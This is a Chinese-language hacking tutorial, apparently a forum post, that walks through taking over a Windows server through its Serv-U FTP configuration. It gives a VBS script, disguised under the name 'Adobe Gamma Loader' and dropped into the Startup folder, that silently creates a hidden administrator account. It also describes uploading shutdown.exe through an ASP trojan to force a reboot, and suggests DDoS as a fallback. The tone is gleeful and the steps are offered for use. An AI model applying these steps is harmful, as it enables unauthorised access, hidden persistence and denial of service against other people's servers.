注：在此之前最好在自己的機(jī)器上裝一個(gè)Serv-U,  
我們先看看ServUStartUpLog.txt  
Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat  
。。。。。。。。。。  
版本挺新阿，呵呵  
接著看看ServUDaemon.ini（用戶配置文件）  
哇考，里面的用戶真多阿！  
接著我們把這個(gè)文件的內(nèi)容復(fù)制一下，然后粘貼到本地serv－u的ServUDaemon.ini文件中，記住這時(shí)候最好停掉你的serv－u，保存文件，接著打開ServUAdmin.exe，重新添加一個(gè)用戶，記住這個(gè)用戶最好是管理員權(quán)限，必須對目錄和文件可以進(jìn)行讀寫可執(zhí)行等一切操作，接著把用戶主目錄設(shè)為c:\  
哈哈哈，到次為止大家都知道我的用意了把！  
接這ftp上去  
哈哈c盤的東西全部暴露了，現(xiàn)在我們對c盤有讀寫權(quán)限，可以進(jìn)行任何操作（注意：serv－u的管理員權(quán)限和nt的管理員權(quán)限不是一樣的，serv－u的管理員只能配置serv－u）  
由于對方做了端口過濾，辦法不是很多，可以參考一篇修改注冊表根改端口過濾的文章，是灰色軌跡論壇的一個(gè)網(wǎng)友寫的，哈哈，在這里就不多說了！  
我們先寫一個(gè)vbs腳本，把這個(gè)腳本重命名為Adobe Gamma Loader，這樣管理員不容易發(fā)現(xiàn)！  
腳本內(nèi)容：  
set wshshell=createobject ("wscript.shell" )  
a=wshshell.run ("cmd.exe /c net user allen ***** /add",0)  
b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)  
大家都能看懂把，哈哈  
然后把他傳到Documents and Settings\All Users\「開始」菜單\程序\啟動\  
呵呵為什么要vbs腳本呢？原因很簡單，就是不讓管理員看見那個(gè)跳出來的黑黑的dos窗口。  

接著用asp木馬上傳一個(gè)shutdown.exe  
然后執(zhí)行shutdown.exe 127.0.0.1 /r  
哈哈，有時(shí)候可能不會成功，是權(quán)限的原因，具體。。。我也不太清楚。  
不過在nt or 2000上普通用戶都可以重起機(jī)器  
還有一個(gè)辦法就是在你的機(jī)器上新建一個(gè)計(jì)劃任務(wù)，內(nèi)容就是定時(shí)重啟動計(jì)算機(jī)，然后把他放到對方計(jì)劃任務(wù)的目錄下，如果對方?jīng)]有開計(jì)劃任務(wù)就不行了！  
如果還是成功不了你就用ddos把，哈哈，很暴力的讓對方拒絕服務(wù)，接這就會重啟（有可能是管理員操作的）  

最新評論